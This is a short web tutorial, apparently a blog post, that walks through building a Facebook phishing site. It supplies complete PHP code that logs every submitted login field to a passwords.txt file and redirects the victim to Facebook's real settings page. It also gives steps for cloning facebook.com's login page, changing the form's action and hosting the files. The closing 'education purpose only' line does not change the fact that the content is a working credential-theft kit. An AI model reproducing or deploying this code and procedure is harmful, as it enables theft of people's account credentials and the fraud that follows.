Phishing is a form of social engineering where a criminal hacker tries to trick the user into clicking a malicious link or downloading an infected attachment or divulging sensitive or confidential information.
The goal is to steal sensitive data like credit card and login information, or to install malware on the victim’s machine.
Here are the easiest way to setup a phishing website. We will take Facebook as example.
First of all, we need to create the log file for the passwords. Open a notepad, leave it empty and save it as passwords.txt.
Second, open another new notepad and copy these lines of php codes :
<?php
header(“Location: https://www.facebook.com/settings?tab=security “);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Remember the name of the text file that we saved earlier. In this case, it will be passwords.txt. Edit it accordingly. And save the notepad as get_password_and_redirect.php. Take note on the .php extension.
Next is we need to create a website similar to Facebook. The simplest way is by duplicating the original website. Just go to www.facebook.com and save the main page. The file name should be index.html
Then, we need to do some minor edit on the index.html. Open it on notepad and find these lines – form id=”login_form”. Delete the lines in the action function – “http://www.facebook.com/login…………..110” and save the file.
Now we need to upload these files into a web server. Once uploaded, you are done.
To test whether it is working or not, just go to the link and enter your username and password to login. It will redirect you to your actual Facebook account. But what you will not notice is, it will save the login details in the passwords.txt file. Go on see it yourself.
That’s all for now. This tutorial is for education purpose only